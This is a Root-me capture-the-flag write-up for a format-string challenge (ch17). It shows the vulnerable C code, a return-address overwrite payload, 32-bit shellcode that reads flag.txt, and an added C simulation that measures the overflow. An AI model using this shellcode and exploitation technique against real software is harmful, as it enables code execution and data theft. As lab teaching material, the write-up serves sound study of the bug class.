Root-me
char outbuf[512];
char buffer[512];
char user[12];
...
fgets(user, sizeof(user), stdin);
user[strlen(user) - 1] = '\0';
...
sprintf (buffer, "ERR Wrong user: %400s", user);
sprintf (outbuf, buffer); /* the vulnerable part: buffer, which now holds the user's data, is itself the format string */
This challenge was a little different: you have to overflow outbuf by using the format string bug, because the direct input is far too short. fgets() keeps at most 11 bytes and the NUL fix-up on the next line clobbers the last one, so only 10 bytes of input survive. That is not enough for shellcode on the stack, so the only way is to load the shellcode into an environment variable and feed its address to EIP.
The first sprintf() always produces 416 bytes (the 16-byte "ERR Wrong user: " prefix plus the %400s field, with the user data right-aligned at the end). When the second sprintf() parses that string as a format, a %125d inside the user data expands to 125 characters, so outbuf receives 16 + 391 + 125 + 4 = 536 bytes: the 4 address bytes that end the 9-byte payload land 20 bytes past outbuf, on the saved return address.
But I had some problems with the execve() shellcode, so I used a cat(.passwd) shellcode and got the answer.
/* 32-bit Linux shellcode (int 0x80): open("flag.txt", O_RDONLY), then
   read the file one byte at a time and write each byte to stdout until
   read() returns 0, then exit(0). The file name is stored after the code
   and its address is recovered with the jmp / call / pop trick. */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"flag.txt";
from struct import pack   # Python 2: str + packed bytes
payload = "%121u" + pack("<I", 0xffffd4ce)
(python -c 'print "%125d\xd1\xfe\xff\xbf"'; cat) | ./ch17
I didn't use ;cat, I was trying ./ch17 < imp instead.
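The width amplification described above, and the reason the payload is "%125d" followed by 4 address bytes, replayed as an added example that is not part of the original write-up or of the ch17 binary. It reproduces the two sprintf() calls into an oversized scratch area so the overflow can be measured instead of triggered. The buffer sizes (512/12), the "ERR Wrong user: " prefix and the %400s field are taken from the snippet above; treating offset 532 as the location of the saved return address is an assumption inferred from the width the write-up used, not something the page states about the binary's stack layout.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's own code. Sizes and prefix are the
 * ones from the ch17 snippet; the target offset 532 is an assumption. */
#define OUTBUF_SIZE 512
#define USER_SIZE   12
#define PREFIX      "ERR Wrong user: "   /* 16 bytes */
#define PAD_WIDTH   400

/* Mimics fgets(user, 12, stdin) followed by user[strlen(user)-1] = '\0':
 * fgets keeps at most 11 bytes and the last kept byte is always replaced by
 * the NUL, so at most 10 attacker bytes survive. Returns the surviving length. */
static size_t simulate_user_input(const char *line, char user[USER_SIZE]) {
    strncpy(user, line, USER_SIZE - 1);
    user[USER_SIZE - 1] = '\0';
    if (user[0] != '\0')
        user[strlen(user) - 1] = '\0';
    return strlen(user);
}

/* Number of attacker bytes that survive the input handling for one line. */
static size_t surviving_bytes(const char *line) {
    char user[USER_SIZE];
    return simulate_user_input(line, user);
}

/* Length the vulnerable second sprintf() would write into the 512-byte
 * outbuf. The first sprintf() always yields 16 + 400 = 416 bytes with the
 * user data right-aligned; the second one parses that whole string as a
 * format, so a "%125d" inside the user data grows into 125 characters.
 * snprintf() with one dummy argument for the single %d measures it safely. */
static size_t overflow_length(const char *line, char *scratch, size_t scratch_len) {
    char user[USER_SIZE];
    char buffer[OUTBUF_SIZE];
    simulate_user_input(line, user);
    sprintf(buffer, PREFIX "%400s", user);
    int n = snprintf(scratch, scratch_len, buffer, 0);  /* buffer is attacker-controlled */
    return n < 0 ? 0 : (size_t)n;
}

/* Bytes written past the end of outbuf for a given input line (0 if none). */
static size_t overflow_bytes(const char *line) {
    char scratch[4096];
    size_t total = overflow_length(line, scratch, sizeof scratch);
    return total > OUTBUF_SIZE ? total - OUTBUF_SIZE : 0;
}

/* Checks that the last 4 surviving user bytes (the address) land exactly at
 * byte offset `target` of the expanded output, i.e. on the chosen stack slot. */
static int address_lands_at(const char *line, size_t target) {
    char user[USER_SIZE];
    char scratch[4096];
    size_t ulen = simulate_user_input(line, user);
    size_t total = overflow_length(line, scratch, sizeof scratch);
    if (ulen < 4 || total != target + 4)
        return 0;
    return memcmp(scratch + target, user + ulen - 4, 4) == 0;
}

/* Width N for "%Nd" so that a payload of `payload_len` surviving bytes puts
 * its trailing address at `target`. The first sprintf() inserts
 * PAD_WIDTH - payload_len spaces after the prefix, so the address starts at
 *   16 + (400 - payload_len) + N  ==>  N = target - 16 - (400 - payload_len).
 * For target 532 and the 9-byte payload "%NNNd" + address this gives 125. */
static long required_width(size_t target, size_t payload_len) {
    return (long)target - (long)strlen(PREFIX) - (long)(PAD_WIDTH - payload_len);
}

int main(void) {
    /* Constructed input: what `print "%125d\xd1\xfe\xff\xbf"` pipes in,
     * newline included (fgets keeps it, the NUL fix-up strips it). */
    const char *line = "%125d\xd1\xfe\xff\xbf\n";
    char scratch[4096];
    size_t total = overflow_length(line, scratch, sizeof scratch);
    printf("surviving input bytes: %zu\n", surviving_bytes(line));
    printf("outbuf receives %zu bytes (%zu past its end)\n", total, overflow_bytes(line));
    printf("address lands at offset 532: %s\n", address_lands_at(line, 532) ? "yes" : "no");
    printf("width needed for offset 532: %ld\n", required_width(532, 9));
    return 0;
}
```

Changing the width by one moves the address by one byte, which is why a wrong guess of the saved-EIP offset shows up as a plain crash rather than a jump into the environment; required_width() is the arithmetic to redo when the layout (or the address length) differs.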